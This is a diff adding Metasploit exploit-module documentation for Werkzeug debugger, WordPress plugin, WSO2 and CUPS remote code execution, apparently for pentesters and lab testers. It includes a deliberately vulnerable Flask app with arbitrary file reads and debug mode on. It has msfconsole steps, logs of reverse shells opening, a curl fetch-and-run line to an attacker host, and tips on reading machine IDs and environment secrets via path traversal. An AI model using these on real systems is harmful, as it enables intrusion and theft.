+    RUN pip install werkzeug==0.11.5 flask==0.12.5
+    COPY report.txt .
+    COPY --chmod=744 app.py .
+    EXPOSE 80
+    ENTRYPOINT ["./app.py"]
+
+#### werkzeug-0.10.Dockerfile
+
+    # syntax=docker/dockerfile:1
+    FROM python:2
+    RUN pip install werkzeug==0.10 flask==0.12.5
+    COPY report.txt .
+    COPY --chmod=744 app.py .
+    EXPOSE 80
+    ENTRYPOINT ["./app.py"]
+
+#### werkzeug-3.0.3-basicauth.Dockerfile
+
+    # syntax=docker/dockerfile:1
+    FROM python:3
+    RUN pip install werkzeug==3.0.3 flask==3.0.3 flask-httpauth==4.8.0
+    COPY report.txt .
+    COPY --chmod=744 app-basicauth.py app.py
+    EXPOSE 80
+    ENTRYPOINT ["./app.py"]
+
+#### app.py
+
+    #!/usr/bin/env python
+
+    import click
+    from flask import Flask, request, url_for, make_response
+    from sys import argv
+
+    app = Flask(__name__)
+
+    @app.route("/")
+    def index():
+        return (
+            '<p><a href="' + url_for("getdownload", file="report.txt") + '">'
+            'Download Report Using GET</a></p>'
+            '<p><form method="post" action="' + url_for("postdownload") + '">'
+            '<input name="file" type=hidden value="report.txt">'
+            '<input type="submit" value="Download Report Using POST">'
+            '</form></p>'
+    )
+
+    def build_response(filename):
+        with open(filename) as file:
+             response = make_response(file.read())
+             response.headers['Content-disposition'] = 'attachment'
+             return response
+
+    @app.route("/getdownload")
+    def getdownload():
+        return build_response(request.args.get('file'))
+
+    @app.route("/postdownload", methods=['POST', 'PUT'])
+    def postdownload():
+        return build_response(request.form['file'])
+
+    @click.command()
+    @click.option("--no-evalex", is_flag=True, default=False)
+    def runserver(no_evalex):
+        evalex = not no_evalex
+        app.run(host='0.0.0.0', port=80, debug=True, threaded=True,
+                use_reloader=False, use_evalex=evalex)
+
+    if __name__ == '__main__':
+        runserver()
+
+#### app-basicauth.py
+
+    #!/usr/bin/env python
+
+    import click
+    from flask import Flask, request, url_for, make_response
+    from sys import argv
+
+    from flask_httpauth import HTTPBasicAuth
+    from werkzeug.security import generate_password_hash, check_password_hash
+
+    app = Flask(__name__)
+
+    auth = HTTPBasicAuth()
+    users = {"admin": generate_password_hash("admin")}
+
+    @auth.verify_password
+    def verify_password(username, password):
+        if username in users and \
+                check_password_hash(users.get(username), password):
+            return username
+
+    @app.route("/")
+    @auth.login_required
+    def index():
+        return (
+            '<p><a href="' + url_for("getdownload", file="report.txt") + '">'
+            'Download Report Using GET</a></p>'
+            '<p><form method="post" action="' + url_for("postdownload") + '">'
+            '<input name="file" type=hidden value="report.txt">'
+            '<input type="submit" value="Download Report Using POST">'
+            '</form></p>'
+    )
+
+    def build_response(filename):
+        with open(filename) as file:
+             response = make_response(file.read())
+             response.headers['Content-disposition'] = 'attachment'
+             return response
+
+    @app.route("/getdownload")
+    @auth.login_required
+    def getdownload():
+        return build_response(request.args.get('file'))
+
+    @app.route("/postdownload", methods=['POST', 'PUT'])
+    @auth.login_required
+    def postdownload():
+        return build_response(request.form['file'])
+
+    @click.command()
+    @click.option("--no-evalex", is_flag=True, default=False)
+    def runserver(no_evalex):
+        evalex = not no_evalex
+        app.run(host='0.0.0.0', port=80, debug=True, threaded=True,
+                use_reloader=False, use_evalex=evalex)
+
+    if __name__ == '__main__':
+        runserver()
+
+#### report.txt
+
+    Hi there, I'm a sample report

 ## Verification Steps

-  1. Install the application
-  2. Start msfconsole
-  3. Do: `use exploit/multi/http/werkzeug_debug_rce`
-  4. Do: `set rport <port>`
-  5. Do: `set rhost <ip>`
-  6. Do: `check`
-```
-[+] 10.108.106.201:8081 - The target is vulnerable.
-```
-  7. Do: `set payload python/meterpreter/reverse_tcp`
-  8. Do: `set lhost <ip>`
-  9. Do: `exploit`
-  10. You should get a shell.
+1. Run the docker containers
+2. Start msfconsole
+
+### Werkzeug 3.0.3 using /console
+
+3. Do: `use exploit/multi/http/werkzeug_debug_rce`
+4. Do: `set RHOSTS <Iip>`
+5. Do: `set LHOST <ip>`
+6. Do: `set VHOST 127.0.0.1`
+7. Do: `set MACADDRESS <mac-address>`
+8. Do: `set MACHINEID <machine-id>`
+9. Do: `set FLASKPATH /usr/local/lib/<python3.version>/site-packages/flask/app.py` (where `<python3.version>` matches the version on the system being exploited)
+10. Do: `run`
+11. You should see a PIN and a cookie being logged then get a shell.
+
+### Werkzeug 3.0.3 using debugger (GET)
+
+12. Do: `set TARGETURI /getdownload?file=`
+13. Do: `run`
+14. You should see a PIN and a cookie being logged then get a shell.
+
+### Werkzeug 3.0.3 using debugger (POST)
+
+15. Do: `set METHOD POST`
+16. Do: `set TARGETURI /postdownload`
+17. Do: `set REQUESTBODY file=`
+18. Do: `run`
+19. You should see a PIN and a cookie being logged then get a shell.
+
+### Werkzeug 1.0.1 using /console
+
+20. Do: `unset METHOD`
+21. Do: `unset TARGETURI`
+22. Do: `unset REQUESTBODY`
+23. Do: `set RPORT 81`
+24. Do: `set TARGET 1`
+25. Do: `set MACADDRESS <mac-address>`
+26. Do: `set MACHINEID <machine-id>`
+27. Do: `set FLASKPATH /usr/local/lib/python2.7/site-packages/flask/app.pyc`
+28. Do: `run`
+29. You should see a PIN and a cookie being logged then get a shell.
+
+### Werkzeug 1.0.1 using /debugger (GET)
+
+30. Do: `set TARGETURI /getdownload?file=`
+31. Do: `run`
+32. You should see a PIN and a cookie being logged then get a shell.
+
+### Werkzeug 1.0.1 using debugger (POST)
+
+33. Do: `set METHOD POST`
+34. Do: `set TARGETURI /postdownload`
+35. Do: `set REQUESTBODY file=`
+36. Do: `run`
+37. You should see a PIN and a cookie being logged then get a shell.
+
+### Werkzeug 0.11.5 using /console
+
+38. Do: `unset METHOD`
+39. Do: `unset TARGETURI`
+40. Do: `unset REQUESTBODY`
+41. Do: `set RPORT 82`
+42. Do: `set TARGET 2`
+43. Do: `set MACADDRESS <mac-address>`
+44. Do: `set MACHINEID <machine-id>`
+45. Do: `run`
+46. You should see a PIN and a cookie being logged then get a shell.
+
+### Werkzeug 0.11.5 using /debugger (GET)
+
+47. Do: `set TARGETURI /getdownload?file=`
+48. Do: `run`
+49. You should see a PIN and a cookie being logged then get a shell.
+
+### Werkzeug 0.11.5 using debugger (POST)
+
+50. Do: `set METHOD POST`
+51. Do: `set TARGETURI /postdownload`
+52. Do: `set REQUESTBODY file=`
+53. Do: `run`
+54. You should see a PIN and a cookie being logged then get a shell.
+
+### Werkzeug 0.10.1 (No authentication required) using /console
+
+55. Do: `unset METHOD`
+56. Do: `unset TARGETURI`
+57. Do: `unset REQUESTBODY`
+58. Do: `set RPORT 83`
+59. Do: `set TARGET 3`
+60. Do: `set AUTHMODE none`
+61. Do: `set MACADDRESS <mac-address>`
+62. Do: `set MACHINEID <machine-id>`
+63. Do: `run`
+64. You should see a PIN and a cookie being logged then get a shell.
+
+### Werkzeug 0.10.1 (No authentication required) using /debugger (GET)
+
+65. Do: `set TARGETURI /getdownload?file=`
+66. Do: `run`
+67. You should see a PIN and a cookie being logged then get a shell.
+
+### Werkzeug 0.10.1 (no authentication required) using debugger (POST)
+
+68. Do: `set METHOD POST`
+69. Do: `set TARGETURI /postdownload`
+70. Do: `set REQUESTBODY file=`
+71. Do: `run`
+72. You should see a PIN and a cookie being logged then get a shell.
+
+### Werkzeug 3.0.3 using debugger (POST) and known PIN with Basic HTTP Auth
+
+73. Do: `set RPORT 84`
+74. Do: `set TARGET 0`
+75. Do: `set AUTHMODE known-PIN`
+76. Do: `set HTTPUSERNAME admin`
+77. Do: `set HTTPPASSWORD admin`
+78. Do: `set PIN 1234`
+79. Do: `run`
+80. You should see a cookie being logged then get a shell.
+
+### Werkzeug 3.0.3 interactive debugger disabled
+
+81. Do: `set RPORT 85`
+82. Do: `unset AUTHMODE`
+83. Do: `set MACADDRESS <mac-address>`
+84. Do: `set MACHINEID <machine-id>`
+85. Do: `set FLASKPATH /usr/local/lib/<python3.version>/site-packages/flask/app.py` (where `<python3.version>` matches the version on the system being exploited)
+86. Do: `run`
+87. You should see a failure due to the check failing.

 ## Options

-  **TARGETURI**
+### `AUTHMODE`

-  TARGETURI by default is `/console`, as defined by werkzeug, however it can be changed within the python script.
+Method of authentication. Valid values are:
+
+- `generated-cookie`: Cookie generated from information provided about the
+  application's environment. **When this mode is used, the following additional
+  options must be set:**
+  - `APPNAME`: The name of the application according to Werkzeug. This is often
+    `Flask`, `DebuggedApplication` or `wsgi_app`. Used along with other
+    information to generate a PIN and cookie.
+  - `CGROUP`: Control group. This may be an empty string (''), for example if
+    the OS running the app is Linux and supports cgroup v2, or the OS is not
+    Linux. If you have path traversal on Linux, this could be read from
+    `/proc/self/cgroup`
+  - `FLASKPATH`: Path to (and including) `site-packages/flask/app.py`. *If you
+    have triggered the debugger via an exception, it will be at the top of the
+    stack trace. E.g. `/usr/local/lib/python3.12/site-packages/flask/app.py`*.
+    **Note that the file extension may need to be changed to .pyc**
+  - `MACADDRESS`: The MAC address of the system that the application is running
+    on. *If you have path traversal on Linux, this could be read from
+    `/sys/class/net/eth0/`*
+  - `MACHINEID`:
+    - On Linux: *If you have path traversal on Linux, this could be read from
+      /etc/machine-id, or if that doesn't exist,
+      /proc/sys/kernel/random/boot_id.*
+    - On Windows: This is a UUID stored in the registry at
+      `HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid`.
+    - On macOS,: This is the UTF-8 encoded serial number of the system
+      (lower-case hexadecimal), padded to 32 characters. E.g. `N0TAREALSERIAL`
+      becomes
+      `4e3054415245414c53455249414c000000000000000000000000000000000000`. This
+      can be retrieved with the following command
+      `ioreg -c IOPlatformExpertDevice | grep \"serial-number\"`
+  - `MODULENAME`: Name of the application module. Often `flask.app` or
+    `werkzeug.debug`
+  - `SERVICEUSER`: User account name that the service is running under.
+    [This may be an empty string ('') in some cases](https://github.com/pallets/werkzeug/blob/main/src/werkzeug/debug/__init__.py#L172)
+    . *If you have path traversal on Linux, you may be able to read this from
+    `/proc/self/environ`*
+- `known-cookie`: Cookie provided by user. **When this mode is used, the
+  following additional option must be set:**
+  - `COOKIE`: The HTTP cookie to use for authentication to the debugger.
+- `known-PIN`: **Does not bypass PIN-locked applications.** PIN provided by
+  user. **When this mode is used, the following additional option must be set:**
+  - `PIN`: Known 6 digit PIN to use for authentication. This can be set to a
+    custom value by the application developer, in which case generating the pin
+    won't work. *However, if you have path traversal, you may be able to
+    retrieve the PIN by reading the application source code, or on Linux by
+    reading `/proc/self/environ` to obtain the value. of the
+    `WERKZEUG_DEBUG_PIN` environment variable. It may also be possible to obtain
+    the PIN by accessing the logging that Werkzeug prints to stdout*.
+- `none`: For applications that don't require authentication. I.e. Werkzeug
+  version 0.10 or lower or PIN authentication has been disabled by the
+  application developer.
+
+### `METHOD`
+
+HTTP method used to access debugger or console. This is typically GET if the
+`TARGETURI` is `/console` but it may be necessary to use other methods to
+trigger the debugger. Valid values are: `GET`, `HEAD`, `POST`, `PUT`, `DELETE`,
+`OPTIONS`, `TRACE` and `PATCH`. **When `METHOD` is `POST`, `PUT` or `PATCH` the
+following additional option may be set:**
+
+- `REQUESTBODY`: Body to send in POST/PUT/PATCH request, if required to trigger
+  the debugger. E.g. invalid form value to raise an exception. **When this is
+  set the following additional option may be set:**
+  - `REQUESTCONTENTTYPE`: Request body encoding. Default:
+    `application/x-www-form-urlencoded`
+
+### `TARGETURI`
+
+The path to the console or resource used to trigger the debugger. Default value
+is `/console`.
+
+### `VHOST`
+
+The value to use in the HTTP `Host` header. It may be necessary to set this to
+`127.0.0.1` or `localhost` if the target Werkzeug version is 3.0.3 or later,
+however this may hamper connectivity if the `Host` header is validated before
+the request is passed to the application.
+
+### `TARGET`
+
+Determines which algorithm the exploit module will use to generate a pin and
+cookie. Valid values are:
+
+- `0`: Werkzeug > 1.0.1 (Flask > 1.1.4)
+- `1`: Werkzeug 0.11.6 - 1.0.1 (Flask 1.0 - 1.1.4)
+- `2`: Werkzeug 0.11 - 0.11.5 (Flask < 1.0)
+- `3`: Werkzeug < 0.11 (Flask < 1.0)

 ## Scenarios

 Example utilizing the previously mentioned sample app listed above.

-```
-msf > use exploit/multi/http/werkzeug_debug_rce
-msf exploit(werkzeug_debug_rce) > set rport 8081
-rport => 8081
-msf exploit(werkzeug_debug_rce) > set rhost 10.108.106.201
-rhost => 10.108.106.201
-msf exploit(werkzeug_debug_rce) > check
-[+] 10.108.106.201:8081 - The target is vulnerable.
-msf exploit(werkzeug_debug_rce) > set payload python/meterpreter/reverse_tcp
-payload => python/meterpreter/reverse_tcp
-msf exploit(werkzeug_debug_rce) > set lhost 10.108.106.121
-lhost => 10.108.106.121
-msf exploit(werkzeug_debug_rce) > exploit
+    $ msfconsole -q                         
+    msf6 > use exploit/multi/http/werkzeug_debug_rce
+    [*] No payload configured, defaulting to python/meterpreter/reverse_tcp
+    msf6 exploit(multi/http/werkzeug_debug_rce) > set RHOSTS 192.168.23.5
+    RHOSTS => 192.168.23.5
+    msf6 exploit(multi/http/werkzeug_debug_rce) > set LHOST 192.168.23.117
+    LHOST => 192.168.23.117
+    msf6 exploit(multi/http/werkzeug_debug_rce) > set VHOST 127.0.0.1
+    VHOST => 127.0.0.1
+    msf6 exploit(multi/http/werkzeug_debug_rce) > set MACADDRESS 02:42:ac:12:00:04
+    MACADDRESS => 02:42:ac:12:00:04
+    msf6 exploit(multi/http/werkzeug_debug_rce) > set MACHINEID 8d496199-a25e-4340-9c8d-2dc2041c75f8
+    MACHINEID => 8d496199-a25e-4340-9c8d-2dc2041c75f8
+    msf6 exploit(multi/http/werkzeug_debug_rce) > set FLASKPATH /usr/local/lib/python3.12/site-packages/flask/app.py
+    FLASKPATH => /usr/local/lib/python3.12/site-packages/flask/app.py
+    msf6 exploit(multi/http/werkzeug_debug_rce) > run

-[*] Started reverse handler on 10.108.106.121:4444
-[*] Sending stage (25277 bytes) to 10.108.106.201
-[*] Meterpreter session 2 opened (10.108.106.121:4444 -> 10.108.106.201:36720) at 2015-07-09 19:02:52 -0400
+    [*] Started reverse TCP handler on 192.168.23.117:4444
+    [*] Running automatic check ("set AutoCheck false" to disable)
+    [*] Debugger allows code execution
+    [!] The service is running, but could not be validated. Debugger requires authentication
+    [*] Generated authentication PIN: 105-774-671
+    [*] Generated authentication cookie: __wzdb0f3242143622dccd6f0=9999999999|3037ec0e9248
+    [*] Sending stage (24772 bytes) to 192.168.23.5
+    [*] Meterpreter session 1 opened (192.168.23.117:4444 -> 192.168.23.5:62474) at 2024-10-06 19:34:20 +0100

-meterpreter > getpid
-Current pid: 13034
-meterpreter > getuid
-Server username: root
-meterpreter > sysinfo
-Computer     : werkzeug
-OS           : Linux 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24)
-Architecture : x86_64
-Meterpreter  : python/python
-meterpreter > shell
-Process 13037 created.
-Channel 0 created.
-/bin/sh: 0: can't access tty; job control turned off
-# ls
-app.py  app.pyc  werkzeug
-# exit
-meterpreter > exit
-[*] Shutting down Meterpreter...
-```
+    meterpreter > getpid
+    Current pid: 38
+    meterpreter > getuid
+    Server username: root
+    meterpreter > sysinfo
+    Computer        : 3eb759665d5f
+    OS              : Linux 6.6.51-0-virt #1-Alpine SMP PREEMPT_DYNAMIC 2024-09-12 12:56:22
+    Architecture    : aarch64
+    System Language : C
+    Meterpreter     : python/linux
+    meterpreter > shell
+    Process 41 created.
+    Channel 1 created.
+
+    ls
+    app.py
+    bin
+    boot
+    dev
+    etc
+    home
+    lib
+    media
+    mnt
+    opt
+    proc
+    report.txt
+    root
+    run
+    sbin
+    srv
+    sys
+    tmp
+    usr
+    var
+    exit
+
+## Credits
+    
+- 2015 - h00die (mike[at]shorebreaksecurity.com)
+  - Initial module targetting versions 0.10 and older of Werkzeug that do not require authentication.
+- 2024 - Graeme Robinson (metasploit[at]grobinson.me/@GraSec)
+  - Support up to and including version 3.0.3 of Werkzeug via 3 different authentication mechanisms:
+  - Generated Cookie (bypasses PIN-lock)
+  - Known-Cookie (bypasses PIN-lock)
+  - Known-PIN
@@ -0,0 +1,169 @@
+## Vulnerable Application
+
+The vulnerability affects the **Really Simple SSL** plugin, version **9.1.1** and below, allowing an **authentication bypass** attack.
+This can be leveraged to bypass 2FA with specified `user_id` and gain full control of the WordPress instance.
+
+### Pre-requisites:
+- **Docker** and **Docker Compose** installed on your system.
+
+
+### Setup Instructions
+
+1. **Download the Docker Compose file**:
+   Below is the content of the **docker-compose.yml** file to set up WordPress with the vulnerable plugin and a MySQL database.
+
+```yaml
+version: '3.1'
+
+services:
+  wordpress:
+    image: wordpress:latest
+    restart: always
+    ports:
+      - 5555:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: chocapikk
+      WORDPRESS_DB_PASSWORD: dummy_password
+      WORDPRESS_DB_NAME: exploit_market
+    mem_limit: 512m
+    volumes:
+      - wordpress:/var/www/html
+      - ./custom.ini:/usr/local/etc/php/conf.d/custom.ini
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: exploit_market
+      MYSQL_USER: chocapikk
+      MYSQL_PASSWORD: dummy_password
+      MYSQL_RANDOM_ROOT_PASSWORD: '1'
+    volumes:
+      - db:/var/lib/mysql
+
+volumes:
+  wordpress:
+  db:
+```
+
+2. **Add custom PHP configuration**:
+    - Create a file named `custom.ini` in the same directory as `docker-compose.yml` with the following content:
+
+```ini
+upload_max_filesize = 64M
+post_max_size = 64M
+```
+
+3. **Start the Docker environment**:
+- In the directory where you saved the `docker-compose.yml` file, run the following command to start the services:
+
+```bash
+docker-compose up -d
+```
+
+4. **Install and activate the plugin**:
+- Download the vulnerable version of **Really Simple SSL**:
+```bash
+wget https://downloads.wordpress.org/plugin/really-simple-ssl.9.1.1.zip
+```
+- Extract the plugin:
+```bash
+unzip really-simple-ssl.9.1.1.zip
+```
+- Copy the plugin files to the WordPress container:
+```bash
+docker cp really-simple-ssl wordpress:/var/www/html/wp-content/plugins/
+```
+- Navigate to `http://localhost:5555/wp-admin` in your browser and activate the plugin in the WordPress admin panel.
+
+5. **Enable Two-Factor Authentication**:
+- Go to **Settings > Really Simple Security**.
+- Activate **Two-Factor Authentication**.
+
+
+## Verification Steps
+
+1. **Set up WordPress** with the vulnerable **Really Simple SSL** plugin.
+2. **Start Metasploit** using the command `msfconsole`.
+3. Use the correct module for the vulnerability:
+
+```bash
+use exploit/multi/http/wp_reallysimplessl_2fa_bypass_rce
+```
+
+4. Set the target's IP and URI:
+
+```bash
+set RHOSTS <target_ip>
+set TARGETURI /
+```
+
+5. **Run the module**:
+
+```bash
+run
+```
+
+6. **Verify the Authentication Bypass**:
+- After running the module, the payload will bypass Two-Factor Authentication and attempt to create a new administrator.
+
+## Options
+
+### USERID
+
+The user ID to target for 2FA bypass (default: 1)
+
+## Scenarios
+
+### Example 1: PHP Meterpreter (ARCH_PHP)
+
+```bash
+msf6 exploit(multi/http/wp_reallysimplessl_2fa_bypass_rce) > run http://127.0.0.1:5555
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] WordPress Version: 6.5.3
+[+] Detected vulnerable plugin slug: really-simple-ssl
+[+] The target appears to be vulnerable. Plugin really-simple-ssl appears to be vulnerable.
+[*] 2FA bypass successful. Uploading plugin...
+[*] Executing the payload at /wp-content/plugins/wp_1ftvf/ajax_pottw.php...
+[*] Sending stage (40004 bytes) to 172.18.0.3
+[+] Deleted ajax_pottw.php
+[+] Deleted wp_1ftvf.php
+[+] Deleted ../wp_1ftvf
+[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.18.0.3:37730) at 2024-11-18 20:07:17 +0100
+
+meterpreter > sysinfo 
+Computer    : a8dddfbbb9e2
+OS          : Linux a8dddfbbb9e2 5.15.0-125-generic #135-Ubuntu SMP Fri Sep 27 13:53:58 UTC 2024 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
+
+### Example 2: Linux Command Shell (ARCH_CMD)
+
+```bash
+msf6 exploit(multi/http/wp_reallysimplessl_2fa_bypass_rce) > run http://127.0.0.1:5555
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] WordPress Version: 6.5.3
+[+] Detected vulnerable plugin slug: really-simple-ssl
+[+] The target appears to be vulnerable. Plugin really-simple-ssl appears to be vulnerable.
+[*] 2FA bypass successful. Uploading plugin...
+[*] Executing the payload at /wp-content/plugins/wp_3wbfa/ajax_gjreh.php...
+[*] Sending stage (3045380 bytes) to 172.18.0.3
+[+] Deleted ajax_gjreh.php
+[+] Deleted wp_3wbfa.php
+[+] Deleted ../wp_3wbfa
+[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.18.0.3:50344) at 2024-11-18 20:12:00 +0100
+
+meterpreter > sysinfo 
+Computer     : 172.18.0.3
+OS           : Debian 11.8 (Linux 5.15.0-125-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,153 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in the WordPress WP Time Capsule plugin, versions <= 1.22.21.
+The vulnerability arises from an unauthenticated arbitrary file upload flaw due to improper validation logic in the plugin.
+
+To replicate a vulnerable environment for testing:
+
+1. Install WordPress using the provided Docker Compose configuration.
+2. Download and install the [WP Time Capsule plugin v1.22.21](https://downloads.wordpress.org/plugin/wp-time-capsule.1.22.21.zip).
+3. Verify that the plugin is activated and accessible on the local network.
+4. Register for a WP Time Capsule account and connect the plugin to an external storage system (e.g., Google Drive, Dropbox).
+5. Access `wp-admin/admin.php?page=wp-time-capsule-settings#wp-time-capsule-tab-advanced` to enable the **file upload functionality**
+by clicking **"Click here to show upload options"**.
+This action triggers the `prepare_file_upload_index_file_wptc` function, which creates the required `index.php` file
+in the `/wp-tcapsule-bridge/upload/php/` directory, making the issue exploitable.
+
+## Docker Compose Configuration
+
+```yaml
+version: '3.1'
+
+services:
+  wordpress:
+    image: wordpress:6.3.2
+    restart: always
+    ports:
+      - 5555:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: root
+      WORDPRESS_DB_PASSWORD: dummy_password
+      WORDPRESS_DB_NAME: exploit_market
+    mem_limit: 8G
+    volumes:
+      - wordpress:/var/www/html
+      - ./custom.ini:/usr/local/etc/php/conf.d/custom.ini
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: exploit_market
+      MYSQL_USER: root
+      MYSQL_PASSWORD: dummy_password
+      MYSQL_RANDOM_ROOT_PASSWORD: '1'
+    volumes:
+      - db:/var/lib/mysql
+
+volumes:
+  wordpress:
+  db:
+```
+
+Create a `custom.ini` file with the following content:
+
+```ini
+upload_max_filesize = 64M
+post_max_size = 64M
+```
+
+## Verification Steps
+
+1. Set up a WordPress instance with the WP Time Capsule plugin (version 1.22.21) using the provided `docker-compose.yml`.
+2. Launch `msfconsole` in your Metasploit framework.
+3. Use the module: `use exploit/multi/http/wp_time_capsule_file_upload_rce`.
+4. Set `RHOSTS` to the IP address or hostname of the target.
+5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload and return a session.
+
+## Options
+
+No additional options are required beyond the default ones provided in Metasploit.
+
+## Scenarios
+
+### Successful Exploitation Against WordPress with WP Time Capsule 1.22.21
+
+**Setup**:
+
+- Local WordPress instance with WP Time Capsule version 1.22.21.
+- Metasploit Framework.
+
+**Steps**:
+
+1. Start `msfconsole`.
+2. Load the module:
+```bash
+use exploit/multi/http/wp_time_capsule_file_upload_rce
+```
+3. Set `RHOSTS` to the target's IP (e.g., `172.18.0.3`).
+4. Configure other necessary options (e.g., `TARGETURI`).
+5. Launch the exploit:
+```bash
+exploit
+```
+
+**Expected Results**:
+
+With `php/meterpreter/reverse_tcp`:
+
+```plaintext
+msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > run http://172.18.0.3
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/wp-time-capsule/readme.txt
+[*] Found version 1.22.21 in the plugin
+[+] The target appears to be vulnerable. WP Time Capsule plugin appears to be vulnerable.
+[*] Uploading payload: rJ.php with MIME type: message/http...
+[+] Payload uploaded successfully. Parsing response...
+[*] Triggering the payload at: http://172.18.0.3/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/files/rJ.php
+[*] Sending stage (40004 bytes) to 172.18.0.3
+[+] Deleted rJ.php
+[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.18.0.3:42434) at 2024-12-11 00:48:18 +0100
+
+meterpreter > sysinfo 
+Computer    : 0bd3f3b7102e
+OS          : Linux 0bd3f3b7102e 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
+Meterpreter : php/linux
+```
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```plaintext
+msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > run http://172.18.0.3
+
+[*] Command to run on remote host: curl -so ./EHsooyPGi http://192.168.1.36:8080/LoPlnjEpeOexZNVppn6cAA; chmod +x ./EHsooyPGi; ./EHsooyPGi &
+[*] Fetch handler listening on 192.168.1.36:8080
+[*] HTTP server started
+[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/wp-time-capsule/readme.txt
+[*] Found version 1.22.21 in the plugin
+[+] The target appears to be vulnerable. WP Time Capsule plugin appears to be vulnerable.
+[*] Uploading payload: Ps.php with MIME type: application/zip...
+[+] Payload uploaded successfully. Parsing response...
+[*] Triggering the payload at: http://172.18.0.3/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/files/Ps.php
+[*] Client 172.18.0.3 requested /LoPlnjEpeOexZNVppn6cAA
+[*] Sending payload to 172.18.0.3 (curl/7.74.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.18.0.3
+[+] Deleted Ps.php
+[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.18.0.3:50396) at 2024-12-11 01:06:52 +0100
+
+meterpreter > sysinfo 
+Computer     : 172.18.0.3
+OS           : Debian 11.8 (Linux 5.15.0-126-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
@@ -0,0 +1,74 @@
+## Vulnerable Application
+
+A vulnerability in the 'Add API Documentation' feature allows malicious users with specific permissions
+(`/permission/admin/login` and `/permission/admin/manage/api/publish`) to upload arbitrary files to a user-controlled
+server location. This flaw could be exploited to execute remote code, enabling an attacker to gain control over the server.
+
+```yaml
+services:
+  api-manager:
+    image: wso2/wso2am:4.0.0-alpine
+    container_name: swo2_api_manager
+    ports:
+      - "9443:9443"
+
+```
+
+```bash
+docker-compose up
+```
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use multi/http/wso2_api_manager_file_upload_rce`
+1. Do: `set rhosts [ip]`
+1. Do: `set lhost [ip]`
+1. Do: `run`
+1. You should get a shell.
+
+## Scenarios
+
+### WSO2 API Manager 4.0.0
+```
+msf6 exploit(multi/http/wso2_api_manager_file_upload_rce) > exploit
+
+[*] Started reverse TCP handler on 0.0.0.0:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking target...
+[+] Authentication successful
+[+] The target appears to be vulnerable. Detected WSO2 API Manager 4.0.0 which is vulnerable.
+[+] Authentication successful
+[*] Listing APIs...
+[+] Document created successfully
+[*] Uploading payload...
+[+] Payload uploaded successfully
+[*] Executing payload... 
+[+] Payload executed successfully
+[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:58206) at 2024-11-03 15:36:37 +0100
+
+id
+uid=802(wso2carbon) gid=802(wso2) groups=802(wso2)
+pwd
+/home/wso2carbon/wso2am-4.0.0
+exit
+[*] 127.0.0.1 - Command shell session 2 closed.
+```
+
+## Options
+
+### HttpUsername (required)
+
+The username to authenticate with.
+
+### HttpPassword (required)
+
+The password of the user to authenticate with.
+
+### RHOSTS (required)
+
+The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+
+### RPORT (required)
+
+The target port (TCP)
@@ -0,0 +1,119 @@
+## Vulnerable Application
+
+This module exploits vulnerabilities in OpenPrinting CUPS that allow an attacker on the LAN to advertise a malicious printer that triggers remote code execution when a victim sends a print job to it. For a technical analysis of the vulnerability, read the [original researcher's publication](https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/). The vulnerabilities affect the following components and versions:
+
+- cups-browsed <= 2.0.1
+- libcupsfilters <= 2.1b1
+- libppd <= 2.1b1
+- cups-filters <= 2.0.1
+
+Successful exploitation requires user interaction (victim must attempt to print to the malicious printer), but no CUPS services need to be reachable via accessible ports. Code execution occurs in the context of the 'lp' user. NOTE: Many mNDS multicast advertisements will be sprayed by this module to increase the odds of automatically populating the victim's printer list.
+
+## Testing
+
+The module has been tested against Ubuntu 22.04 with an unpatched default CUPS installation. The exploit should work against most Linux distributions that use a vulnerable version of CUPS for printing.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/multi/misc/cups_ipp_remote_code_execution`
+3. `set SRVHOST <YOUR_IP_ADDRESS>` (cannot be 0.0.0.0)
+4. `set LHOST <YOUR_IP_ADDRESS>`
+5. `set PrinterName <PRINTER_NAME>` (defaults to "PrintToPDF")
+6. `exploit`
